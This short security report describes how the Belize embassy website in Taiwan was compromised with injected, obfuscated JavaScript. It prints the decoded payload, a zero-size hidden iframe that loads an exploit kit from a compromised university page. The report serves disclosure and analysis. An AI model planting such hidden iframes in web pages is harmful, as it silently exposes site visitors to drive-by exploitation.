The website of the embassy of Belize in Taiwan has been compromised and an obfuscated JavaScript has been injected into it.

After decoding, the script reveals itself as an IFrame pointing to one of the pages on the Kaohsiung Medical University website:

<iframe src="http://[HIDDEN].club.kmu.edu.tw/ice/index.php" width="0" height="0"></iframe>

We are all too familiar with the usual scenario where hackers compromise a legitimate website so that its visitors get redirected to the hacker’s own servers where the exploitation kit is hosted. The ironic thing this time is the fact that hackers didn’t redirect victims to servers of their own, but to the university website which they have compromised and installed their exploit kit (probably an ice-pack) on it, and which they have used for other compromised websites.

At the time of writing, however, the exploit-kit has been removed from the university website.